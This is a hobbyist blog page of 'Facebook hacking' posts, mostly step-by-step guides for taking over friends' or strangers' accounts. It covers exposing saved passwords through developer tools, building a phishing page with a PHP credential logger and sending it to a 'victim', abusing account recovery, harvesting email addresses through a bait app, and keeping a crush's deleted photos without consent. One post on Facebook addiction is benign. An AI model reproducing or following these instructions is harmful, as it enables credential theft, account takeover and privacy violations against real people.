Showing posts with label facebook tricks. Show all posts
Showing posts with label facebook tricks. Show all posts

See passwords behind the Asterisk

Today we are going to learn how to see the password behind the asterisk . The benefit of doing this is that you can see your friends facebook, gmail , twitter password and guess what this activity is not even illegal.The action that we are going to perform required a little bit knowledge of HTML5 . For that you can  visit Learn Html5 and css3.

Steps to do that
1.Open a facebook account or you can open any account which you want to hack , here we are going to see how to hack facebook.

2.Now when your friend typed his password and before clicking enter tell him to stop for a second so that you can see his password.

3.Press F12 and you will see a console window as given in the picture below.

4.Now you have to search for the code written below.

5.Press ctrl + f  a search window will open , now type "password" in that box without the quotes , the above search show you a result but the code you have to find is written two tree lines below the searching result.Open all the tags "<td>".

6.Double click on password that is in the code as shown in the picture above and it will open as a editor , Now type text instead of password and after that click on any blank space to exit and save the editor.

7.You can see in the picture that a password on the top is now no more behind the asterisk.

Enjoy hacking....
                                           for u....
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Facebook Addiction is Affecting our Mind Badly

 In february  2004, when facebook was launched , No one can predict that facebook will going to be a largest social network of the world . Today, facebook has million of users, only because we are interested in others life.People from every age group are present on Facebook and the number of teens are more. This have become one of our daily routine activity that we cannot live without Facebook now. Facebook Addiction captured us so badly that if we are away from computer/laptop then we try to access this on our cell phone, tablets, palmtops or any other device.
Scientist keep doing many researches on human physiological behavior and on their attraction towards facebook.

Facebook and Internet addiction can have damaging effects, such as a decrease in our attention span — in fact, since 2000, our collective attention span has decreased by 40%.

Signs of Facebook addiction.

1.Over Sharing:At a time when many netizens are concern over the issue of privacy online, it’s strange to find that there are still a number of us who voluntarily share our deepest secrets about our intimate lives on Facebook. It has perhaps a lot to do with the gratification of being acknowledged or approved by our peers. As I’ve mentioned in an earlier article, The Psychology of Facebook, such social affirmations by our friends in our network is a key draw of social networking sites.

2.Checking your Facebook Whenever Possible:This means checking out for any updates to your newsfeed or responses to your posts every time you don’t know what to do. In other words, the default choice for your freetime activity is to be on Facebook. So what do you do? You leave your Facebook open in the background, switching between work or assignments to the page every few minutes. Even when you are outside enjoying a drink with a friend, you log in to the Facebook app on your smartphone every now and then during brief moments of non-interactions.

3.Overly Concerned with facebook image:Have you ever spent more than fifteen minutes of your time thinking about what you ought to type for your status update? After you’ve decided on what you should update and posted it, do you eagerly anticipate how others will respond to it? This is what it means when I mention your ‘Facebook image’. To some extent, we are all concerned over how we project ourselves to the rest of the world, even when it comes to our online presence.

4.Reporting on Facebook:Most of us have seen friends in our network who almost certainly never fail to appear on our newsfeed each time we log on to Facebook. It could be some status update, check-in, posting of their photos and such. Their posts tend to be on very mundane matters, much like how someone reports to another what he or she is doing at any given moment. They report to you their daily routines (e.g. taking a piss), broadcast check-ins to uninteresting places like the street they live in, upload self-portraits and such.

5.Mad Rush to more Friends:There is a perceived ‘arms race’ between you and your other friends to see who has the highest number of friends on their network.That Show a sign of Addiction.

6.Compromising Offline Social Life:As you get used to communicating on Facebook via messaging, sharing photos and posts, commenting and ‘liking’ others etc, it may come to a point when you get more comfortable socializing online than offline. You become over-reliant on Facebook to fulfill your social needs and may start sacrificing the time spent on real-life meet-ups for coffee with your friends.That’s not healthy.

Check Out the infographic Below  which show the facebook addiction:

How to Defeat Facebook Addiction:

1.Recognize the signs of facebook addiction.
2.Start questioning what you're doing on Facebook.
3.Decide what is of value on Facebook.
4.Try giving up Facebook for a specific event to see how you fare
5.Target solutions to enable smarter, brighter usage of Facebook in   
   the future
6.Be careful of the race to have as many friends as possible.
7.Avoid being a Facebook automaton.
I hope this article will help u....
                                                   for u....

plz like and follow our blog on facebook and Twitter.

How to hack Facebook with phishing page

          How to hack Facebook with phishing page

                                                                                                      by:Navprabhat Singh

hacking facebook account

As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....


facebook hack

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

                                  a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script

4.You will have to find a text which looks like ..


5.delete all the text written in red colour and instead of it write post.php.then it will look like...


6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is will look like a pic given below .

hacking script

8.Open a new notepad and save the given data with the name post.php.

header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use or else www.,

11.I prefer u to use 000webhost because it will be easy to use.
hosting website

12.You have to make a account in that ,after that it looks like a picture given below.

facebook script hosting website
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.


20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.

       click here to view a video tutorial with the readymade phishing pages....


phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....


Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....

                                                           thank you....

Facebook hacking in 5 mins

                   Facebook hacking in 5 steps

                                                                                                          by:Navprabhat Singh


In my previous post i told you about the Facebook hacking through a phishing page.
Now i m going to tell u how to hack a Facebook account in a very easy way...

steps to hack a account....

1.Now open the Facebook page and enter your victim's email,and any password.

2.Try for three or more times then a new tab will open.

3.Now enter the captcha. and  press enter.

4.Now u will see the tab given in the picture.


5.Click on this is me button.then a new window will pop up.


6.Now click on Reset My Password.and u will see the new page given in picture.

7.Unmark all the option then Click on "no longer have access to these".

8.Now enter any email id which haven't access on any social network.I prefer u to make a new gmail id. It hardly take 5-10 mins.

9.Now a new page will open which will ask a security question. 

10.If u know the answer then it's good,cause if your answer is correct then your 
      victim Facebook  account is hacked but u will access it after 24 hours.

11.Now u have to enter the new password .that will be accessed after 24 hours.

                   this is a one method to hack any Facebook account.


If your victim try to login in his account before 24 hours then the whole process is failed.not only this  your victim also get a email which contains your ip be careful while doing this....


hope u like it ... in my next post i'll show u how to crack windows 7 admin password....
                                                thank you.....

How to see the deleted pictures of your crush

    How to see the deleted pictures of your crush
                                                       by:Navprabhat Singh

love makes your life

Generally we log in to our Facebook account to see our crush,her profile,pictures and many other things like her status etc etc.(I don't know about you but i do.)Suppose your crush deleted all her pictures

Now what should you do?

Read more to find out the method to view the deleted image of your crush.

Steps to see the deleted images on Facebook are as follows:

1.First open the image you want to see,that picture must not be deleted before the process.

2.Suppose i have to see a particular image all the time even if after she has deletes that picture.(Just a example :D).

3.Now right click on that pic and you will see the option copy image URL  click on that.

how to see the deleted photo

4.Paste it in a notepad and save the file.

view the deleted images of your crush

5.Now even if the person deleted that picture you will be able to see that image without his/her permission on Facebook,or even if she blocks you , you would still have access to that image.

6.Lets take an example ,i am going to delete the picture which is shown above.

7.Now to see the image after it is been deleted by the user , you just need to paste the copied url from the notepad in to your address bar,and you will be able to the image.

NOTE:A question may arise now in your mind now that 

How can someone see my images even if they are deleted?
Whenever we upload anything (for example images, videos , status etc) it is saved in a Facebook main server and remains there for  3 years even if that file is deleted by a user,that URL is a bypass to that saved location and it will grant you to see the pic.

view the deleted images of your crush

hope u like it
hacking operating system
                                for u....

Also Read:

How to Hack a Girls Brain?

 How to know the Mobile Number of my Crush? 

How to send Pictures in Facebook chat?

Expose your friend's email address of Facebook

Expose your friend's email address of Facebook

                                              by:Navprabhat Singh

hack any email id
We know that for hacking anyone Facebook password first we have to know about his/her facebook email id .Sometimes our victim hide the email id ,then it becomes quiet difficult to hack his password.
Now in this paper i will show you how to expose anyone email id of Facebook so that we have at least something about him to hack his Facebook password.This method is quiet easy and can not harm anyone as we just expose his email id not anything else.

Steps to do that....

1.First you have change your facebook browsing from https to http.

2.Go to account setting ->Security->then see the first option click on that and disable it.As shown in pic.

3.Now you have to join the application to expose your friend email id ,link is given below.

4.After you join a given application you will see a page given below.

how to hack email id

5.Now you need a id of your friend just type of victim.

6.Username you will easily get on looking to his profile.

email id hacked

7.Now you have type,like mine is

8.When you enter the id in the application you have joined before  it will show you the error as shown in pic.

9.It means your victim must have join the second app that is love percentage application.It is because when victim join the app the app will steal his email id.

10.Now send this link to your victim and when your victim join the u will be able to see his email id.

11.It's a simple love app so no need to worry, your victim definitely join this app.

12.When your victim join the application,Now enter the id or repeat the step 8.

13.It will give you the email id as well as id of  all of his friends.

hack id via facebook

14.know it is quiet complicated but easy to do.

Enjoy hacking....
                             for u....